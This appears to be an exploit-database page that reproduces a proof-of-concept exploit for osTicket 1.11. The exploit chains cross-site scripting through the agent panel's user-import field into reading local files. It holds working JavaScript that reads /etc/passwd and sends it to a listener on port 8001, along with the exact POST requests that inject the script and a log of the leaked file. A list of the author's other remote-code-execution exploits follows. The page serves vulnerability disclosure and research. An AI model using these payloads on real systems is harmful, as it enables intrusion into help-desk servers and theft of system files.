Search for hundreds of thousands of exploits

"osTicket 1.11 - Cross-Site Scripting / Local File Inclusion"

Author

Exploit author

AkkuS

Platform

Exploit platform

php

Release date

Exploit published date

2019-04-25

  1
  2
  3
  4
  5
  6
  7
  8
  9
 10
 11
 12
 13
 14
 15
 16
 17
 18
 19
 20
 21
 22
 23
 24
 25
 26
 27
 28
 29
 30
 31
 32
 33
 34
 35
 36
 37
 38
 39
 40
 41
 42
 43
 44
 45
 46
 47
 48
 49
 50
 51
 52
 53
 54
 55
 56
 57
 58
 59
 60
 61
 62
 63
 64
 65
 66
 67
 68
 69
 70
 71
 72
 73
 74
 75
 76
 77
 78
 79
 80
 81
 82
 83
 84
 85
 86
 87
 88
 89
 90
 91
 92
 93
 94
 95
 96
 97
 98
 99
100
101
102
103
104
105
106
107
# Exploit Title: osTicket v1.11 - Cross-Site Scripting to Local File
Inclusion
# Date: 09.04.2019
# Exploit Author: Γ–zkan Mustafa Akkuş (AkkuS) @ehakkus
# Contact: https://pentest.com.tr
# Vendor Homepage: https://osticket.com
# Software Link: https://github.com/osTicket/osTicket
# References: https://github.com/osTicket/osTicket/pull/4869
#             https://pentest.com.tr/exploits/osTicket-v1-11-XSS-to-LFI.html
# Version: v1.11
# Category: Webapps
# Tested on: XAMPP for Linux
# Description: This is exploit proof of concept as XSS attempt can
# lead to an LFI (Local File Inclusion) attack at osTicket.
##################################################################
# PoC

# There are two different XSS vulnerabilities in the "Import"
field on the Agent Panel - User Directory field. This vulnerability
causes a different vulnerability. The attacker can run the malicious
JS file that he uploads in the XSS vulnerability. Uploaded JS files
can be called clear text. Therefore, attackers do not have to use
a different server to perform an attack. Then it is possible to
create "Local File Inclusion" vulnerability too.

The attacker can upload a JS file as follows.
------------------------------------------------------------------

function readTextFile(file)
{
    var rawFile = new XMLHttpRequest();
    rawFile.open("GET", file, false);
    rawFile.onreadystatechange = function ()
    {
        if(rawFile.readyState === 4)
        {
            if(rawFile.status === 200 || rawFile.status == 0)
            {
                var allText = rawFile.responseText;
                allText.src = 'http://localhost:8001' +
rawFile.responseText;
                document.body.appendChild(allText);
            }
        }
    }
    rawFile.send(null);
}

readTextFile("/etc/passwd");

------------------------------------------------------------------

# Smilar JS File Link;

/upload/file.php?key=y3cxcoxqv8r3miqczzj5ar8rhm1bhcbm
&expires=1554854400&signature=be5cea87c37d7971e0c54164090a391066ecbaca&id=36"

After this process, we can run the JS file in XSS vulnerability.


# Our First Request for XSS to LFI;
------------------------------------------------------------------

POST /upload/scp/users.php?do=import-users
Host: localhost
Content-Type: multipart/form-data; boundary=---------------------------[]


-----------------------------[]
Content-Disposition: form-data; name="__CSRFToken__"

8f6f85b8d76218112a53f909692f3c4ae7768b39
-----------------------------[]
Content-Disposition: form-data; name="pasted"


-----------------------------[]
Content-Disposition: form-data; name="import"; filename="users-20190408.csv"
Content-Type: text/csv

<script src="
http://localhost/4/osTicket-v1.11/upload/file.php?key=y3cxcoxqv8r3miqczzj5ar8rhm1bhcbm&expires=1554854400&signature=be5cea87c37d7971e0c54164090a391066ecbaca&id=36
"></script>

-----------------------------[]--




# Our Second Request for XSS to LFI;
------------------------------------------------------------------
POST /upload/scp/ajax.php/users/import HTTP/1.1
Host: localhost

__CSRFToken__=8f6f85b8d76218112a53f909692f3c4ae7768b39&pasted=%3Cscript+src%3D%22http%3A%2F%2Flocalhost%2F4%2FosTicket-v1.11%2Fupload%2Ffile.php%3Fkey%3Dy3cxcoxqv8r3miqczzj5ar8rhm1bhcbm%26expires%3D1554854400%26signature%3Dbe5cea87c37d7971e0c54164090a391066ecbaca%26id%3D36%22%3E%3C%2Fscript%3E&undefined=Import+Users
------------------------------------------------------------------


# After sending XSS requests,
# When the attacker listens to port 8001, he/she will receive a request as
follows.

root@AkkuS:~# python -m SimpleHTTPServer 8001
Serving HTTP on 0.0.0.0 port 8001 ...
127.0.0.1 - - [09/Apr/2019 11:54:42] "GET / HTTP/1.1" 200 -
127.0.0.1 - - [09/Apr/2019 11:54:42] "GET
/root:x:0:0:root:/root:/bin/bashdaemon:x:1:1:daemon:/usr/sbin:/usr/sbin...[More]
Release DateTitleTypePlatformAuthor
2020-03-11"CTROMS Terminal OS Port Portal - 'Password Reset' Authentication Bypass (Metasploit)"remotelinuxAkkuS
2019-08-12"Webmin 1.920 - Unauthenticated Remote Code Execution (Metasploit)"remotelinuxAkkuS
2019-08-12"ManageEngine OpManager 12.4x - Privilege Escalation / Remote Command Execution (Metasploit)"remotemultipleAkkuS
2019-08-12"ManageEngine OpManager 12.4x - Unauthenticated Remote Command Execution (Metasploit)"remotemultipleAkkuS
2019-08-12"ManageEngine Application Manager 14.2 - Privilege Escalation / Remote Command Execution (Metasploit)"remotemultipleAkkuS
2019-07-12"Sahi Pro 8.0.0 - Remote Command Execution"webappsjavaAkkuS
2019-06-17"AROX School-ERP Pro - Unauthenticated Remote Command Execution (Metasploit)"remotephpAkkuS
2019-06-11"Webmin 1.910 - 'Package Updates' Remote Command Execution (Metasploit)"remotelinuxAkkuS
2019-05-14"PHP-Fusion 9.03.00 - 'Edit Profile' Remote Code Execution (Metasploit)"remotephpAkkuS
2019-04-30"Moodle 3.6.3 - 'Install Plugin' Remote Command Execution (Metasploit)"remotephpAkkuS
2019-04-25"osTicket 1.11 - Cross-Site Scripting / Local File Inclusion"webappsphpAkkuS
2019-04-22"ManageEngine Applications Manager 14.0 - Authentication Bypass / Remote Command Execution (Metasploit)"remotemultipleAkkuS
2019-04-18"ManageEngine Applications Manager 11.0 < 14.0 - SQL Injection / Remote Code Execution (Metasploit)"remotewindowsAkkuS
2019-04-15"CuteNews 2.1.2 - 'avatar' Remote Code Execution (Metasploit)"remotephpAkkuS
2019-04-12"ATutor < 2.2.4 - 'file_manager' Remote Code Execution (Metasploit)"webappsphpAkkuS
2019-04-03"TeemIp IPAM < 2.4.0 - 'new_config' Command Injection (Metasploit)"remotephpAkkuS
2019-03-11"Liferay CE Portal < 7.1.2 ga3 - Remote Command Execution (Metasploit)"webappsmultipleAkkuS
2019-03-11"OpenKM 6.3.2 < 6.3.7 - Remote Command Execution (Metasploit)"webappsjspAkkuS
2019-03-07"QNAP TS-431 QTS < 4.2.2 - Remote Command Execution (Metasploit)"remotehardwareAkkuS
2019-03-04"Booked Scheduler 2.7.5 - Remote Command Execution (Metasploit)"webappsphpAkkuS
2019-02-28"Usermin 1.750 - Remote Command Execution (Metasploit)"webappslinuxAkkuS
2019-02-28"Feng Office 3.7.0.5 - Remote Command Execution (Metasploit)"webappsphpAkkuS
2019-02-12"Jenkins 2.150.2 - Remote Command Execution (Metasploit)"webappslinuxAkkuS
2019-01-24"SirsiDynix e-Library 3.5.x - Cross-Site Scripting"webappscgiAkkuS
2019-01-18"Webmin 1.900 - Remote Command Execution (Metasploit)"remotecgiAkkuS
2019-01-10"eBrigade ERP 4.5 - Arbitrary File Download"webappsphpAkkuS
2019-01-02"Vtiger CRM 7.1.0 - Remote Code Execution"webappsphpAkkuS
2018-12-19"Rukovoditel Project Management CRM 2.3.1 - Remote Code Execution (Metasploit)"webappsphpAkkuS
2018-12-09"i-doit CMDB 1.11.2 - Remote Code Execution"webappsphpAkkuS
2018-12-04"Dolibarr ERP/CRM 8.0.3 - Cross-Site Scripting"webappsphpAkkuS
import requests
response = requests.get('https://www.nmmapper.com/api/exploitdetails/46753/?format=json')

For full documentation follow the link above

Cipherscan. A very simple way to find out which SSL ciphersuites are supported by a target.

Identify and fingerprint Web Application Firewall (WAF) products protecting a website.